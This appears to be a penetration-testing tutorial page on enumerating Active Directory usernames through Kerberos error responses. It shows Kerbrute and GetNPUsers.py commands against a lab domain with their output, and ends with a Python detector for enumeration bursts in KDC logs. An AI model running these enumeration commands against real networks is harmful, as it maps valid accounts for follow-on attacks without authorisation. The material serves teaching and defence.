User Enumeration
Kerberos, while secure, can be susceptible to user enumeration attacks. User enumeration is a technique used by attackers to gather a list of valid usernames in a network. By leveraging specific behaviors of the Kerberos protocol, attackers can determine whether a username exists within an Active Directory (AD) environment.
How User Enumeration via Kerberos Works
Differences in Kerberos Error Messages
Kerberos user enumeration exploits the difference in error messages returned by the Key Distribution Center (KDC) when authenticating with valid versus invalid usernames. When an authentication request is sent to the KDC:
- If the username is valid, the KDC responds with a pre-authentication required error (KDC_ERR_PREAUTH_REQUIRED).
- If the username is invalid, the KDC responds with a principal unknown error (KDC_ERR_C_PRINCIPAL_UNKNOWN).
Tools & Examples
Kerbrute
Kerbrute is a popular tool for enumerating users via Kerberos. It sends authentication requests to the KDC and analyzes the responses to determine valid usernames.
```bash
kerbrute userenum --dc '192.168.10.10' -d "red.lab" usernames.txt
```
```bash
Version: dev (n/a) - 07/16/24 - Ronnie Flathers @ropnop
2024/07/16 15:50:39 > Using KDC(s):
2024/07/16 15:50:39 > 192.168.10.10:88
2024/07/16 15:50:39 > [+] VALID USERNAME: qu35t@red.lab
2024/07/16 15:50:39 > Done! Tested 14 usernames (1 valid) in 0.060 seconds
```
GetNPUsers.py
```bash
GetNPUsers.py -dc-ip 192.168.10.10 red.lab/ -usersfile usernames.txt
```
```bash
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User qu35t doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
```
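On the KDC side, a run like the ones above shows up as a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN responses for many different names sent to a single source. The following is an added example, not part of the original page or of either tool: it flags such sources in a constructed log, and the record layout, source addresses, threshold and window are all assumptions to adapt to your own KDC audit export.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

PRINCIPAL_UNKNOWN = 6  # RFC 4120 error code for KDC_ERR_C_PRINCIPAL_UNKNOWN

# Constructed sample records: "timestamp source_ip requested_name error_code".
# This layout is an assumption; map your own KDC audit export onto it.
SAMPLE_LOG = """\
2024-07-16T15:50:39.010 192.168.10.50 admin 6
2024-07-16T15:50:39.015 192.168.10.50 backup 6
2024-07-16T15:50:39.021 192.168.10.50 svc_sql 6
2024-07-16T15:50:39.026 192.168.10.50 qu35t 25
2024-07-16T15:50:39.033 192.168.10.50 helpdesk 6
2024-07-16T15:50:39.041 192.168.10.50 jsmith 6
2024-07-16T15:52:10.000 192.168.10.77 jdoe 6
2024-07-16T16:20:00.000 192.168.10.77 jdoe 6
"""


def parse(log):
    """Yield (time, source, name, code) tuples from the constructed format."""
    for line in log.splitlines():
        if line.strip():
            ts, src, name, code = line.split()
            yield datetime.fromisoformat(ts), src, name.lower(), int(code)


def find_enumeration(log, threshold=5, window=timedelta(seconds=10)):
    """Return {source: peak distinct unknown names} for sources that reach
    `threshold` distinct unknown principals inside one sliding window."""
    recent = defaultdict(deque)  # source -> deque of (time, name)
    flagged = {}
    for ts, src, name, code in sorted(parse(log)):
        if code != PRINCIPAL_UNKNOWN:
            continue  # e.g. 25 (KDC_ERR_PREAUTH_REQUIRED) is normal traffic
        q = recent[src]
        q.append((ts, name))
        while ts - q[0][0] > window:
            q.popleft()  # drop entries that fell out of the window
        distinct = len({n for _, n in q})
        if distinct >= threshold:
            flagged[src] = max(flagged.get(src, 0), distinct)
    return flagged


if __name__ == "__main__":
    for src, count in find_enumeration(SAMPLE_LOG).items():
        print(f"{src}: {count} distinct unknown principals in window")
```

Counting distinct names rather than raw failures keeps a single user repeatedly mistyping one account name (the second source in the sample) from triggering the alert.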